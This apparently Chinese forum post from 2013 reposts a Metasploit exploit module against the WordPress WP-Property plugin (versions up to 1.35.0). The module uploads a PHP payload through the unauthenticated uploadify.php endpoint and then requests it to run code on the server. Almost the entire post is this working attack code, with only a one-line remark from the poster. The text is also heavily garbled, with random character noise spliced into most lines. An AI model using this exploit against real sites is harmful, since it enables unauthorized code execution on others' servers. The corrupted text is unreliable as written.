WordPress WP-Property PHP 文件上传漏洞
/ h4 w% X9 m/ \$ I) ~: R
Z3 G. T7 @3 E, ~; E$ }* O ## # This file is part of the Metasploit Framework and may be subject to
: b7 d, _3 v$ P$ D, ?; k7 s- ^* {; i* Y4 o8 c
# redistribution and commercial restrictions. Please see the Metasploit
2 Y3 {: u* i8 v( t) a
& ~" w! n; d3 r4 o# Framework web site for more information on licensing and terms of use.% Q5 c# o( k2 f* O" k: Y1 M
# s0 w# ^, h2 J4 d9 E2 @3 a
# http://metasploit.com/framework/ ##
% I6 x2 L4 C" _) J# r/ `8 b+ d0 M& `$ k% |1 `1 y' e5 e0 h
9 B! ]0 q& E( ?) O. f
. f# W7 O# U! k9 H( `
7 j4 Z4 Y: }/ ]( r: z I# _9 Q. M
4 @- ?0 G1 m: s1 N1 trequire 'msf/core'
8 O6 p. z6 A: w+ @require 'msf/core/exploit/php_exe'
; F/ I; ~0 z$ R' O# e8 [. |( \, A. Y, E" _$ _% I
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',' s3 j$ Q) J+ }: S3 \
'Description' => %q{# c6 b" I* E7 o. c" }
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
P6 g# K0 j% }7 W/ n$ d[
0 v3 q# B: }: P9 g( [: f'Sammy FORGIT', # initial discovery- T: H% h1 K% ?! o8 m
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
8 @1 E) o1 n* u: L], S* R/ w* h0 d0 P' R6 C5 S( z
'License' => MSF_LICENSE,
8 d C1 H! j( X- g% l/ a'References' =>
, c+ L: w: _0 Q% b[' u7 O; t2 y- {3 s* r, t
[ 'OSVDB', '82656' ],6 y6 p+ c/ j& ?5 S% R
[ 'BID', '53787' ], W" K' t! W h+ }7 m2 n" A# C
[ 'EDB', '18987'],% J0 v, R" [3 Y) X% y( \
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ] r. J8 I2 F! }6 N+ c! f: y) X
],$ [* F2 u) R% n6 O
'Payload' =>
+ M7 j$ I1 I% X4 @{
7 x0 i! ^* T6 ^+ @& m2 Q' b0 V7 U7 f'BadChars' => "\x00",* k( g% C: T9 }/ V' ~5 q4 m
},
8 N3 Q4 d( Q0 [. L" N! G- s6 W1 g9 @'Platform' => 'php',
! `0 x$ J3 N5 t! a7 ~ Z- W0 U'Arch' => ARCH_PHP,
' I& g P# R/ V& u5 J" {/ e'Targets' =>
, b u x; S! |6 I& s[
3 v5 [4 [" i- d2 }! A9 J[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 g, [4 M/ a+ L m& H[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]$ S* @: G6 G/ e6 m5 m, c* b% U
],% h1 r; M$ Q$ r
'DefaultTarget' => 0,9 ?$ e; C- c( ^( O* H
'DisclosureDate' => 'Mar 26 2012'))
: M0 _7 S- }/ M2 v( g8 M, \2 C0 V0 J7 f6 P0 O' \, Q# y
register_options(3 ^$ j% Q9 q0 v, @" T1 r# Z7 n
[
% }! z$ B0 S5 e" mOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
& T+ B& Q. d+ {4 w" p], self.class)
1 s9 V& } g$ yend+ R6 h' L- Q2 Q& x* Q* B
3 p2 l* e: o) h* Y3 o5 Sdef check, W/ n6 q$ Q3 N
uri = target_uri.path" r( @4 E# x$ W1 u- }7 P
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',# Z' N: }9 J0 c* A" F9 o
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
- N. H9 ?5 z8 ^})/ \& U+ v# j+ L) H. _
. Q% k7 M0 d7 ^7 C g' W9 z. ~6 yif not res or res.code != 200& d4 M9 f6 t# b% {! y
return Exploit::CheckCode::Unknown
5 q% _6 T _. T9 s2 B3 Vend
. s' g7 e' }7 Y$ ?; _$ x9 F4 e
" s( ?( R2 x$ x( hreturn Exploit::CheckCode::Appears
6 O4 l; Y, U P2 iend
) M: A# x6 X+ M: a7 q2 B1 }; I# F
! y" o* K a R9 Ndef exploit# p* I0 |# O& c9 y7 f
uri = target_uri.path
) ^2 q1 `) t5 v' Q% V! Buri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
% `# q* B) i9 T7 _9 {
y: j! e4 g4 V! bdata = Rex::MIME::Message.new, c3 W, g- P6 d! b4 ~
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
& Q1 L( O( u, v3 V8 Zdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
4 D* d% @+ I1 R3 a3 Xpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
! o. k. R* e: j
& n+ s/ F2 }5 k% [% T" @print_status("#{peer} - Uploading payload #{@payload_name}")
( X) L- P, ?. Pres = send_request_cgi({
% G' {0 L" Q1 c: M'method' => 'POST',
/ Y& z+ J; Z8 }'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",9 X# K: F- T: b7 ^$ p7 ]6 L+ }# I. g
'ctype' => "multipart/form-data; boundary=#{data.bound}",, {- O- y7 _# P- M8 Q
'data' => post_data! m/ e3 S! W8 d3 R" z
})
) v, y, B+ m/ [6 D& Y; p0 B! ^
) V4 S# r! H" s6 J$ A. [+ d: bif not res or res.code != 200 or res.body !~ /#{@payload_name}/( t+ C/ q% t* V( b9 H i/ `6 q
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")- G; W0 e8 k( L; l4 Y' [
end# U# C! l( C' g8 B' @: X" D J
" G& A' F9 c, r# Jupload_uri = res.body
6 d7 m9 q$ [1 S# @+ ]( X" k7 s" @, B: I: x' E3 u; h
print_status("#{peer} - Executing payload #{@payload_name}")
1 Z4 a. I z* L/ B! |res = send_request_raw({0 z* ?' s8 B1 x7 R+ r' N
'uri' => upload_uri,2 t" ^4 }- p4 O" m- l/ V
'method' => 'GET'
* W: J# m J6 J8 P; l/ W% z})
) [5 @ k, m7 u2 o. Bend/ d; J( u3 I( [7 D4 C
end3 Q% g- \. [. n
1 w; }, h& U; _: ^/ ~ `
不要问我这写的是什么 怎么利用 我是说msf.
6 a4 u$ f, O% f
. \3 ^- E0 L( J8 T+ S$ X# \3 ? |
发表于 2013-1-4 19:51:30
收藏
支持
反对